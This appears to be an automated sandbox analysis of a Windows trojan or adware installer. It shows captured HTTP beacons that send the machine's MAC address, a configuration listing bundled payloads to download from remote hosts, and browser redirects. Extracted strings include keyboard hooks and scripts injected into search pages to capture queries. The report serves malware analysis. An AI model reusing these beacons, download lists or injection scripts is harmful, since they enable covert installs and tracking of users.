...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8.......
.PE..L.....GO.................p.......B...9............@..............
.............&.....O*;*[email protected].........$
..h..............H#...................................................
........................................text....o.......p.............
..... ..`.rdata...*.......,...t..............@[email protected]....~...........
...............@....ndata...P...0...........................rsrc....h.
...$..j..................@[email protected]........%[email protected].
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U....\.}..t .}.F.E.u..H
[email protected][email protected]...
..@..}[email protected]... M..........M........E...FQ.....NU
..M.......M...VT..U........FP..E...............E.P.M...H.@..E..P.E..E.
[email protected]}[email protected].}.j.W.E......E.....
[email protected][email protected][email protected] [email protected].
u.....@._^3.[.....L$...-G...i. @...T.....tUVW.q.3.;5.-G.sD..i. @...D..
S.....t.G.....t...O..t .....u...3....3...F. @..;5.-G.r.[_^...U..QQ
<<< skipped >>>


GET /miniindex/inc/stylemini.css HTTP/1.1
Accept: */*
Referer: hXXp://VVV.mdtxw.org/miniindex/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E)
Host: VVV.mdtxw.org
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Length: 11323
Content-Type: text/css
Last-Modified: Thu, 10 Apr 2014 18:35:54 GMT
Accept-Ranges: bytes
ETag: "e34f8b4eb54cf1:43f"
Server: Microsoft-IIS/6.0
Who: ShanIE
Date: Sun, 29 Jun 2014 01:59:48 GMT
img{border:0}..#mini_wrap .bor_n {...border: 0px currentColor;..}..#mi
ni_wrap .none {...display: none;..}..#mini_wrap {.....}..#closehBtn {.
..background: url("close.png") no-repeat 0px 0px; padding: 0px; top: 0
px; width: 40px; height: 19px; color: rgb(11, 59, 140); font-size: 14p
x; vertical-align: 0px; position: relative;..}..#closehBtn:hover {...b
ackground: url("close.png") no-repeat -40px 0px;..}..#minBtn {...backg
round: url("min.png") no-repeat 0px 0px; padding: 0px; top: 0px; width
: 27px; height: 19px; color: rgb(11, 59, 140); font-size: 14px; vertic
al-align: 0px; position: relative;..}..#minBtn:hover {...background: u
rl("min.png") no-repeat -27px 0px;..}...wrapper {...margin: 0px auto; 
width: 698px; height: 399px; text-align: left;..}...normal_bg {...back
ground: url("normal_bg.png") no-repeat 0px 0px rgb(255, 255, 255);..}.
..body_bg {...position: relative;..}...header {...width: 698px; height
: 33px;..}...nav_box .refresh_box a {...background-image: url("ico_new
2.png"); background-repeat: no-repeat;..}...nav_box .on_bg {...backgro
und-image: url("ico_new2.png"); background-repeat: no-repeat;..}...nav
_box {...padding: 4px 0px 0px 10px; width: 688px;..}...nav_box span {.
..color: rgb(188, 202, 224); float: left;..}...nav_box a {...width: 45
px; height: 26px; text-align: center; color: rgb(11, 59, 140); padding
-top: 3px; font-size: 14px; text-decoration: none; display: inline-blo
ck; position: relative; _vertical-align: middle;..}...nav_box .on_bg {
...background-position: 0px -460px; left: 18px; width: 9px; height
<<< skipped >>>


GET /miniindex/inc/jquery-1.7.2.min.js HTTP/1.1
Accept: */*
Referer: hXXp://VVV.mdtxw.org/miniindex/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E)
Host: VVV.mdtxw.org
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Length: 91342
Content-Type: application/x-javascript
Last-Modified: Thu, 10 Apr 2014 16:44:11 GMT
Accept-Ranges: bytes
ETag: "80ff3c19dc54cf1:43f"
Server: Microsoft-IIS/6.0
Who: ShanIE
Date: Sun, 29 Jun 2014 01:59:48 GMT
/*!. * jQuery JavaScript Library v1.6.1. * hXXp://jquery.com/. *. * Co
pyright 2011, John Resig. * Dual licensed under the MIT or GPL Version
 2 licenses.. * hXXp://jquery.org/license. *. * Includes Sizzle.js. * 
hXXp://sizzlejs.com/. * Copyright 2011, The Dojo Foundation. * Release
d under the MIT, BSD, and GPL Licenses.. *. * Date: Thu May 12 15:04:3
6 2011 -0400. */.(function(a,b){function cy(a){return f.isWindow(a)?a:
a.nodeType===9?a.defaultView||a.parentWindow:!1}function cv(a){if(!cj[
a]){var b=f("<" a ">").appendTo("body"),d=b.css("display");b.rem
ove();if(d==="none"||d===""){ck||(ck=c.createElement("iframe"),ck.fram
eBorder=ck.width=ck.height=0),c.body.appendChild(ck);if(!cl||!ck.creat
eElement)cl=(ck.contentWindow||ck.contentDocument).document,cl.write("
<!doctype><html><body></body></html>");b
=cl.createElement(a),cl.body.appendChild(b),d=f.css(b,"display"),c.bod
y.removeChild(ck)}cj[a]=d}return cj[a]}function cu(a,b){var c={};f.eac
h(cp.concat.apply([],cp.slice(0,b)),function(){c[this]=a});return c}fu
nction ct(){cq=b}function cs(){setTimeout(ct,0);return cq=f.now()}func
tion ci(){try{return new a.ActiveXObject("Microsoft.XMLHTTP")}catch(b)
{}}function ch(){try{return new a.XMLHttpRequest}catch(b){}}function c
b(a,c){a.dataFilter&&(c=a.dataFilter(c,a.dataType));var d=a.dataTypes,
e={},g,h,i=d.length,j,k=d[0],l,m,n,o,p;for(g=1;g<i;g  ){if(g===1)fo
r(h in a.converters)typeof h=="string"&&(e[h.toLowerCase()]=a.converte
rs[h]);l=k,k=d[g];if(k==="*")k=l;else if(l!=="*"&&l!==k){m=l " " k
<<< skipped >>>


GET /web/welcome_cn.htm?ver=2.4.1.9&guid=a64f77031449b9089cdde8cb20ce31cb68f4c3c5f08e420ebe5bab809d8443091403989454&lastver= HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E; TheWorld)
Host: VVV.fjmjm.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: ASERVER/1.2.9-3
Date: Sun, 29 Jun 2014 01:59:42 GMT
Content-Type: text/html
Content-Length: 1469
Connection: keep-alive
Last-Modified: Thu, 17 Apr 2014 15:55:27 GMT
Accept-Ranges: bytes
ETag: "80414a73555acf1:43f"
Who: ShanIE
X-Powered-By-Anquanbao: MISS from uni-zz-gw-sb4
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">.
.<html>..<head>..<meta http-equiv="Content-Type" conten
t="text/html; charset=gb2312">..<title>................</t
itle>..<link href="newioage.css" rel="stylesheet" type="text/css
">..</head>..<body>..<p> </p>..<tab
le width="712" height="49" border="0" align="center" cellpadding="0" c
ellspacing="0">..  <tr>..    <td background="images/guide_
top.jpg"><table width="550" align="center">..        <tr&g
t;..          <td class="t14"><font color="#C8E2FF"><st
rong>................</strong></font></td>..     
   </tr>..      </table></td>..  </tr>..</t
able>..<table width="712" height="350" align="center" background
="images/texture.gif" bgcolor="#FFFFFF">..  <tr>..    <td 
valign="top">..<table width="500" align="center">..        &l
t;tr>..          <td><p class="t14"> </p>.. 
           <p class="t14"><font color="#D38C45" size="4">&
lt;strong>..............................</strong></font>
;</p>..            <p class="t14">........................
..................................................................<
/p>..            <p class="t14"> </p>..           
 </td>..        </tr>..      </table>..      <tab
le width="500" align="center">..        <tr> ..          
<<< skipped >>>

GET /web/newioage.css HTTP/1.1


Accept: */*
Referer: hXXp://VVV.fjmjm.com/web/welcome_cn.htm?ver=2.4.1.9&guid=a64f77031449b9089cdde8cb20ce31cb68f4c3c5f08e420ebe5bab809d8443091403989454&lastver=
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E; TheWorld)
Host: VVV.fjmjm.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: ASERVER/1.2.9-3
Date: Sun, 29 Jun 2014 01:59:44 GMT
Content-Type: text/css
Content-Length: 715
Connection: keep-alive
Last-Modified: Thu, 17 Apr 2014 15:40:05 GMT
Accept-Ranges: bytes
ETag: "8038bc4d535acf1:43f"
Who: ShanIE
X-Powered-By-Anquanbao: MISS from uni-zz-gw-sb4
body {background-color: #dddddd;margin-left: 0px;margin-top: 0px;margi
n-right: 0px;margin-bottom: 0px;}.td {font-size: 14px;line-height: 150
%;color: #666666;}..t12 {font-size: 12px;line-height: 150%;color: #666
666;}..A:link {font-size:12px;text-decoration:none;color: #1F72D0}.A:v
isited {font-size:12px;text-decoration:none;color: #1F72D0}.A:active {
font-size:12px;text-decoration: none;color: #033B7D}.A:hover {font-siz
e:12px;text-decoration:none;color: #FF5A00}..A.white:link {font-size:1
2px;text-decoration:none;color: #cfebff}.A.white:visited {font-size:12
px;text-decoration:none;color: #cfebff}.A.white:active {font-size:12px
;text-decoration: none;color: #ffffff}.A.white:hover {font-size:12px;c
olor: #feffcf}...



GET /stat/?v=1&ac=setup&name=%original file name%.exe&mac=00-0C-29-3B-DF-2F&md5=cd1bf5c8668f31abd345f75407391ed8 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Host: stat.fjmjm.com
Cache-Control: no-cache
Cookie: ASPSESSIONIDCASQABDQ=EIOBAFCDLBCINGLMGINNPAIH


HTTP/1.1 200 OK
Server: ASERVER/1.2.9-3
Date: Sun, 29 Jun 2014 01:59:17 GMT
Content-Type: text/html
Content-Length: 2997
Connection: keep-alive
Who: ShanIE
Cache-control: private
X-Powered-By-Anquanbao: MISS from uni-zz-dl-if1
[ShortCut_1]..Desc=360............Hint=360............Name=360........
....URL=hXXp://VVV.jlbnh.com..Icon=ico\360.ico..[ShortCut_2]..Desc=Int
ernet Explorer..Hint=Internet Explorer..Name=Internet Explorer..URL=ht
tp://VVV.jlbnh.com..Icon=ico\ie.ico..[SoftWare_1]..Desc=..........Hint
=..........Name=F30241_s_0523..URL=hXXp://down.qicc-md.org/F30241_s_05
23.rar..reg=HKLM\SOFTWARE\Baidu\BaiduSd\InstallDir..[SoftWare_2]..Desc
=..........Hint=..........Name=ionrkf_70688..URL=hXXp://down.qicc-md.o
rg/ionrkf_70688.rar..reg=HKLM\SOFTWARE\Baidu\BaiduAn\InstallDir..[Soft
Ware_3]..Desc=......Hint=......Name=dudu_b_55045..URL=hXXp://down.qicc
-md.org/dudu_b_55045.rar..reg=HKCU\Software\Kuping\InstallPath..[SoftW
are_4]..Desc=..........Hint=..........Name=pczh_98_2..URL=hXXp://down.
qicc-md.org/pczh_98_2.rar..reg=HKLM\SOFTWARE\Microsoft\Windows\Current
Version\App Paths\Ainqngz3.9.exe\..[SoftWare_5]..Desc=........Hint=...
.....Name=-8853_1_mvy..URL=hXXp://down.qicc-md.org/-8853_1_mvy.rar..re
g=HKLM\SOFTWARE\Mnying\Mnyingfiledir..[SoftWare_6]..Desc=...... ..Hint
=........Name=yxku_s[106]..URL=hXXp://down.qicc-md.org/yxku_s[106].rar
..reg=HKCU\Software\yxkuBox\InstallPath..[SoftWare_7]..Desc=......Hint
=......Name=xkss_50041..URL=hXXp://down.qicc-md.org/xkss_50041.rar..re
g=HKCU\Software\xuankusoso\InstallMode..[SoftWare_9]..Desc=....FM..Hin
t=....FM..Name=setup_3128..URL=hXXp://down.qicc-md.org/setup_3128.rar.
.reg=HKLM\SOFTWARE\YYMusic3\rd..[SoftWare_11]..Desc=..........Hint=...
.......Name=BaiduPlayerNetSetup_284..URL=hXXp://down.qicc-md.org/B
<<< skipped >>>


GET / HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E; TheWorld)
Host: VVV.jlbnh.com
Connection: Keep-Alive


HTTP/1.1 302 Redirect
Server: nginx/1.4.3.6
Date: Sun, 29 Jun 2014 01:59:41 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By-360WZB: wangzhan.360.cn
Location: hXXp://123.sogou.com/?22014
Who: ShanIE
96..<head><title>Document Moved</title></head>
.<body><h1>Object Moved</h1>This document may be fou
nd <a HREF="hXXp://123.sogou.com/?22014">here</a></body
>..0..



GET /stat/?v=1&ac=setup&name=%original file name%.exe&mac=00-0C-29-3B-DF-2F&md5=cd1bf5c8668f31abd345f75407391ed8 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Host: stat.fjmjm.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: ASERVER/1.2.9-3
Date: Sun, 29 Jun 2014 01:59:16 GMT
Content-Type: text/html
Content-Length: 2997
Connection: keep-alive
Who: ShanIE
Set-Cookie: ASPSESSIONIDCASQABDQ=EIOBAFCDLBCINGLMGINNPAIH; path=/
Cache-control: private
X-Powered-By-Anquanbao: MISS from uni-zz-dl-if1
[ShortCut_1]..Desc=360............Hint=360............Name=360........
....URL=hXXp://VVV.jlbnh.com..Icon=ico\360.ico..[ShortCut_2]..Desc=Int
ernet Explorer..Hint=Internet Explorer..Name=Internet Explorer..URL=ht
tp://VVV.jlbnh.com..Icon=ico\ie.ico..[SoftWare_1]..Desc=..........Hint
=..........Name=F30241_s_0523..URL=hXXp://down.qicc-md.org/F30241_s_05
23.rar..reg=HKLM\SOFTWARE\Baidu\BaiduSd\InstallDir..[SoftWare_2]..Desc
=..........Hint=..........Name=ionrkf_70688..URL=hXXp://down.qicc-md.o
rg/ionrkf_70688.rar..reg=HKLM\SOFTWARE\Baidu\BaiduAn\InstallDir..[Soft
Ware_3]..Desc=......Hint=......Name=dudu_b_55045..URL=hXXp://down.qicc
-md.org/dudu_b_55045.rar..reg=HKCU\Software\Kuping\InstallPath..[SoftW
are_4]..Desc=..........Hint=..........Name=pczh_98_2..URL=hXXp://down.
qicc-md.org/pczh_98_2.rar..reg=HKLM\SOFTWARE\Microsoft\Windows\Current
Version\App Paths\Ainqngz3.9.exe\..[SoftWare_5]..Desc=........Hint=...
.....Name=-8853_1_mvy..URL=hXXp://down.qicc-md.org/-8853_1_mvy.rar..re
g=HKLM\SOFTWARE\Mnying\Mnyingfiledir..[SoftWare_6]..Desc=...... ..Hint
=........Name=yxku_s[106]..URL=hXXp://down.qicc-md.org/yxku_s[106].rar
..reg=HKCU\Software\yxkuBox\InstallPath..[SoftWare_7]..Desc=......Hint
=......Name=xkss_50041..URL=hXXp://down.qicc-md.org/xkss_50041.rar..re
g=HKCU\Software\xuankusoso\InstallMode..[SoftWare_9]..Desc=....FM..Hin
t=....FM..Name=setup_3128..URL=hXXp://down.qicc-md.org/setup_3128.rar.
.reg=HKLM\SOFTWARE\YYMusic3\rd..[SoftWare_11]..Desc=..........Hint=...
.......Name=BaiduPlayerNetSetup_284..URL=hXXp://down.qicc-md.org/B
<<< skipped >>>


GET /?22014 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E; TheWorld)
Host: 123.sogou.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Sun, 29 Jun 2014 01:59:42 GMT
Content-Type: text/html; charset=gbk
Transfer-Encoding: chunked
Connection: keep-alive
P3P: CP="NON DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONa HISa TELa OTPa OUR UNRa IND UNI COM NAV INT DEM CNT PRELOC"
Content-Encoding: gzip
93cf................\.u/...gb!..=....Ek ..6`c9.?..o/.....f&...8.....!.
....!$.Z@r..^..ydqV.........r...=.p~..u..{...9..V.v.....?......A..x..}
.>.?1....Vn......$...S.=......zN...4:m.9=}....D}0..LO.....r.N.6..7.
.....,?&......2.......SY.=h......gN_....S..x...?.c......p............4
.....Zg.*wZ.....[.......{t.X]..v......V..4JMw"Q...n{.4......a.......HL
/._./.&.Z..o..c.i..b.....`.VZ.T....r.&V...N..7..............g4S.....n.
../....k.......L..;.....?.z...>.....?.../?.h9..............NN]...S.
~....W...K...G..7G1.../..]ZG{..^.(..p....t..[..<..w..Q.>....|.G4
....z......q...{...N... .......?:.........u.......'.O....}..3?..O.....
...7...wh......._..........q..K.z...?..........I4...D.m.M4....z...ML7Z
N..OW.U.9..L$Ze...x....zq.X..-..hI...x..8......U.....K.....B.]K.......
....-|.Z\k. ...j!..^.=-^]...d.p..x.`b.O.n&|.L$....b.JJ.N..&..^q......&
lt;].....(.\......Q1.J...d..N...../{c0'..u....6..|..XM....[.4..R..].!.
...n............. ..S..F..h.?E...7./.v..F.O.I.y..t.b..._...Ne}...6...)
Lq..u.S..T=;U.Mu...T..kM5...`..6..`...2.W.S..T.2..6[N..h/.....N..h....
........[hw....Y.4;...\...i......a!;m.h..,7]..P...[.f...l6..$O..,V..g.
.t...z6../...l.>q...F.>.rR=.2......_... ..z...S.w..Yu{.9.......?
..-.j.(.y..@....".o...J.......y....v.....x.r....c...@......[...f.....~
c.].d.u.$&..PoT*n[B .6...A}!.N.yQ.....5.|...b......Z.t.%..f...,U.o..F.
..`80G3.ty.i=x..l..5.....4G..M...:..4........%R.N..<........c.f..J.
...&y.s....._.5.S.....V....{....]....'.~{z5....4....=. ..${n.u.z..Il..
.J..m:...f..".. ..&.X...<ZW. .'..g.4......1.,.h..a.........M...
<<< skipped >>>


GET /web/PopWinParam.asp?d=2014419&mainver=1.0.0&popver=1.0.0&xmlver=20131020010000 HTTP/1.1
User-Agent: Crazyk
Host: stat.fjmjm.com
Cookie: ASPSESSIONIDCASQABDQ=AKOBAFCDMKABOGNAKJHLOMKG


HTTP/1.1 200 OK
Server: ASERVER/1.2.9-3
Date: Sun, 29 Jun 2014 01:59:33 GMT
Content-Type: text/html
Content-Length: 4659
Connection: keep-alive
Who: ShanIE
Cache-control: private
X-Powered-By-Anquanbao: MISS from uni-zz-dl-if1
..<?xml version="1.0" encoding="gb2312"?>..<SoftwareConfig>
;..  <Version>20140629095933</Version>..  <Popwin>..
.    <Item id="1">..      <Subject>........</Subject>
;..      <WinWidth>708</WinWidth>..      <WinHeight>
404</WinHeight>..      <StartUpPosition>0</StartUpPosit
ion>..      <URL>hXXp://VVV.mdtxw.org/miniindex/</URL> 
..      <StartUpTime>10</StartUpTime>..      <ShowIntev
al>7200</ShowInteval>..      <AutoClose>600</AutoClo
se>..      <isShow>1</isShow>..    </Item>..    &
lt;Item id="2">..      <Subject>........</Subject>..   
  <WinWidth>300</WinWidth>..      <WinHeight>265<
/WinHeight>..      <StartUpPosition>1</StartUpPosition>
..      <URL>hXXp://stat.fjmjm.com/a/cpv1.html?t=20140629095933&
lt;/URL> ..      <StartUpTime>50</StartUpTime>..      &
lt;ShowInteval>0</ShowInteval>..      <AutoClose>50<
/AutoClose>..      <isShow>1</isShow>..    </Item>
;..    <Item id="3">..      <Subject>....LB</Subject>
;..      <WinWidth>300</WinWidth>..      <WinHeight>
265</WinHeight>..      <StartUpPosition>1</StartUpPosit
ion>..      <URL>hXXp://stat.fjmjm.com/a/cpv1.html?t=20140629
095933</URL>..      <StartUpTime>200</StartUpTime>..
      <ShowInteval>7200</ShowInteval>..      <AutoC
<<< skipped >>>


GET /web/PopWinParam.asp?d=2014419&mainver=1.0.0&popver=1.0.0&xmlver=20131020010000 HTTP/1.1
User-Agent: hello crazyk
Host: stat.fjmjm.com


HTTP/1.1 200 OK
Server: ASERVER/1.2.9-3
Date: Sun, 29 Jun 2014 01:59:32 GMT
Content-Type: text/html
Content-Length: 4659
Connection: keep-alive
Who: ShanIE
Set-Cookie: ASPSESSIONIDCASQABDQ=AKOBAFCDMKABOGNAKJHLOMKG; path=/
Cache-control: private
X-Powered-By-Anquanbao: MISS from uni-zz-dl-if1
..<?xml version="1.0" encoding="gb2312"?>..<SoftwareConfig>
;..  <Version>20140629095932</Version>..  <Popwin>..
.    <Item id="1">..      <Subject>........</Subject>
;..      <WinWidth>708</WinWidth>..      <WinHeight>
404</WinHeight>..      <StartUpPosition>0</StartUpPosit
ion>..      <URL>hXXp://VVV.mdtxw.org/miniindex/</URL> 
..      <StartUpTime>10</StartUpTime>..      <ShowIntev
al>7200</ShowInteval>..      <AutoClose>600</AutoClo
se>..      <isShow>1</isShow>..    </Item>..    &
lt;Item id="2">..      <Subject>........</Subject>..   
  <WinWidth>300</WinWidth>..      <WinHeight>265<
/WinHeight>..      <StartUpPosition>1</StartUpPosition>
..      <URL>hXXp://stat.fjmjm.com/a/cpv1.html?t=20140629095932&
lt;/URL> ..      <StartUpTime>50</StartUpTime>..      &
lt;ShowInteval>0</ShowInteval>..      <AutoClose>50<
/AutoClose>..      <isShow>1</isShow>..    </Item>
;..    <Item id="3">..      <Subject>....LB</Subject>
;..      <WinWidth>300</WinWidth>..      <WinHeight>
265</WinHeight>..      <StartUpPosition>1</StartUpPosit
ion>..      <URL>hXXp://stat.fjmjm.com/a/cpv1.html?t=20140629
095932</URL>..      <StartUpTime>200</StartUpTime>..
      <ShowInteval>7200</ShowInteval>..      <AutoC
<<< skipped >>>






The Trojan connects to the servers at the folowing location(s):







%original file name%.exe_2644:




.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
http://nsis.sf.net/NSIS_Error
... %d%%
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nslB3.tmp\bind.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nslB3.tmp\bind.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nslB3.tmp
   
.2<2:26212
:.Lw|
.teCF 
.ZGw1
.uYYAaE
nslB3.tmp
0, 0, 0)
S~1\Temp\nslB3.tmp
%original file name%.exe
c:\%original file name%.exe
%Program Files%\shandian"
%Program Files%\shandian
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsbB2.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
4].ea
SqSV~%S=
-mD%C[
k.IE[9
tS.NO
.fSfY
Nullsoft Install System v2.45
%Documents and Settings%\%current user%\Start Menu\Programs\

%original file name%.exe_2644_rwx_10004000_00001000:




callback%d

shandian.exe_2548:




.text
`.rdata
@.data
.rsrc
SSSSh
RSSSSh
QSSSSh
SRjdPSSSSh
QSSSShD
PSSSSh
QSSSShC
SSShT
;;~%U
F\t SSh
FHSSh
VHSSh
F<%u?
t.SVP
unzip 1.01 Copyright 1998-2004 Gilles Vollant - http://www.winimage.com/zLibDll
<4,$?7/'
(3-!0,1'8"5.*2$
inflate 1.2.3 Copyright 1995-2005 Mark Adler
WINMM.dll
WS2_32.dll
IMM32.dll
VERSION.dll
GetWindowsDirectoryW
GetProcessHeap
KERNEL32.dll
GetKeyState
GetAsyncKeyState
EnumThreadWindows
EnumWindows
keybd_event
MapVirtualKeyW
EnumChildWindows
UnhookWindowsHookEx
SetWindowsHookExW
GetKeyboardLayoutNameW
LoadKeyboardLayoutW
GetKeyNameTextW
RegisterHotKey
UnregisterHotKey
USER32.dll
GDI32.dll
comdlg32.dll
RegCloseKey
RegOpenKeyW
RegCreateKeyW
RegDeleteKeyW
RegOpenKeyExW
RegGetKeySecurity
RegEnumKeyW
RegQueryInfoKeyW
RegSetKeySecurity
RegCreateKeyExW
ADVAPI32.dll
ShellExecuteExW
ShellExecuteW
SHFileOperationW
SHELL32.dll
ole32.dll
OLEAUT32.dll
CreateUrlCacheEntryW
CommitUrlCacheEntryW
GetUrlCacheEntryInfoW
InternetCrackUrlW
DeleteUrlCacheEntryW
HttpOpenRequestA
CommitUrlCacheEntryA
HttpAddRequestHeadersA
DeleteUrlCacheEntryA
FindCloseUrlCache
FindNextUrlCacheEntryA
UnlockUrlCacheEntryFileA
FindFirstUrlCacheEntryA
FindNextUrlCacheEntryW
UnlockUrlCacheEntryFileW
FindFirstUrlCacheEntryW
InternetCanonicalizeUrlW
FtpCommandW
FtpOpenFileW
HttpEndRequestW
HttpSendRequestExW
HttpOpenRequestW
FtpGetFileSize
HttpQueryInfoW
WININET.dll
DSOUND.dll
UrlCombineW
UrlIsOpaqueW
PathIsURLW
UrlGetPartW
SHDeleteKeyW
UrlCanonicalizeW
SHEnumKeyExW
UrlIsW
SHQueryInfoKeyW
SHLWAPI.dll
MSVCRT.dll
_acmdln
CoInternetCombineUrl
CoGetClassObjectFromURL
urlmon.dll
NETAPI32.dll
gdiplus.dll
WINTRUST.dll
COMCTL32.dll
URL=%s
_twpass
Content-Disposition: form-data; name="%s"
Content-Disposition: form-data; name="%s"; filename="%s"
cmdline
@%s#%s
%s%s; %s)
Referer: %s
msjava.dll
\msjava.dll
/uploaderapi2.swf
1.2.3
http://%s%s
HTTP/1.0
Mozilla/4.0
www1.baidu.com
www.baidu.com
baidu.com
.jpeg
\\.\PhysicalDrive%d
\\.\Scsi%d:
XXXXXX
ADD_DATE="%s"
LOVEFAV="%d"
LAST_MODIFIED="%s"
LAST_VISIT="%s"
%s=%s
%s=%s HTTPS=%s
0d
error %d with zipfile in unzCloseCurrentFile
error %d with zipfile in unzReadCurrentFile
extracting: %s
error opening %s
%s%s/
The file %s exists. Overwrite ? [y]es, [n]o, [A]ll:
error %d with zipfile in unzOpenCurrentFilePassword
creating directory: %s
error %d with zipfile in unzGetCurrentFileInfo
error %d with zipfile in unzGoToNextFile
error %d with zipfile in unzGetGlobalInfo
.html
.htm0
http:
NUL=%s
DIRNUL=%s
wininit.ini
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E; TheWorld)
00000000000000000001
00000000000000000010
http= HTTPS=
var twFloatTimer%%s;
var twFloatEle%%s;
var twFloatEf%%s = "%ï";
function TWFloatFilterHide%%s( )
if( twFloatEf%%s == "0" )
twFloatEle%%s.removeNode( true );
if( twFloatEle%%s.filters.alpha.opacity > 30 )
twFloatEle%%s.filters.alpha.opacity-=30;
twFloatTimer%%s=window.setTimeout( "TWFloatFilterHide%%s()",100);
window.clearTimeout(twFloatTimer%%s);
twFloatEle%%s.filter="";
twFloatEle%%s.posWidth
twFloatEle%%s.posHeight
twFloatEle%%s.posLeft
twFloatEle%%s.posTop
twFloatEle%%s = document.getElementById( "%%id" );
if( twFloatEf%%s == "1" )
twFloatEle%%s.style.filter="Alpha(Opacity=100, FinishOpacity=0, Style=3)";
K0=http://*.google.c*/search?*q=*
S0=try{col=document.getElementsByName('q');external.SetSearchKey( %max_security_id,col[0].value );}catch (e) {}
K1=http://*.baidu.com/*?*=*
S1=try{col=document.getElementsByName('wd');var str;if( col.length )str= col[0].value;else{col=document.getElementsByName('word');if( col.length ){str
= col[0].value;}}if( str.length != 0 ){external.SetSearchKey( %max_security_id,col[0].value );}}
K2=http://search.live.com/*?q=*
S2=try{col=document.getElementsByName('q');external.SetSearchKey( %max_security_id,col[0].value );}catch (e) {}
SearchLeftPad=7
AdressLeftPad=8
****7@0**.32****
****23-**0@7****
<**19=?4****
****4?=91**<
(4**/8=?7 ***
*** 7?=8/**4(
****,**** ****
**** ****,****
44222222222
-.--.-..*)
$@/ 8"/ 
VS.iw1A<:7
this.isSel = false;
this.bg = this.create('div', '', {}, {'display': 'none', 'zoom': '1', 'filter': 'alpha(opacity=20)', 'backgroundColor': '#000000', 'position': 'absolute', 'zIndex': '998', 'textAlign': 'center', 'width': '100%', 'height': window.screen.availHeight   'px', 'left': '0px', 'top': parseInt(this.$dom.body.parentNode.scrollTop || 0, 10)   'px', 'margin': '0'});
this.pane = this.create('div', '', {'id': 'TW_Plugin_Vest_Pane'}, {'display': 'none', 'backgroundColor': '#FFFFFF', 'padding': '0', 'position': 'absolute', 'zIndex': '999', 'textAlign': 'left'});
this.$dom.body.appendChild(this.bg), this.$dom.body.appendChild(this.pane);
__$Effect.prototype = {
this.pane.innerHTML = '', this.pane.appendChild(b);
var el = this.$dom.createElement(tag);
for (var a in sty || {}) el.style[a] = sty[a];
txt && (el.innerHTML = txt), c && (el.onclick = c);
this.bg.style.display = 'none', this.pane.style.display = 'none', this.$dom.body.style.overflow = this.$dom.body.parentNode.style.overflow = '';
this.$dom.body.onselectstart = this.selEv || null;
setTimeout(function () {for(var i = 0; i < _tag('select').length; i   ) _tag('select')[i].style.visibility = 'visible';}, 1);
document.body.onkeypress = function () {
if(event.keyCode == 13)
URL_Openall();
document.body.scrollTop = 0;
return event.keyCode != 13;
fx && (this.fade(0, this.bg), this.fade(0), this.opacity = 0);
this.bg.style.display = '' , this.pane.style.display = '';
This.selEv = This.$dom.body.onselectstart, This.$dom.body.onselectstart = function() {return This.isSel;};
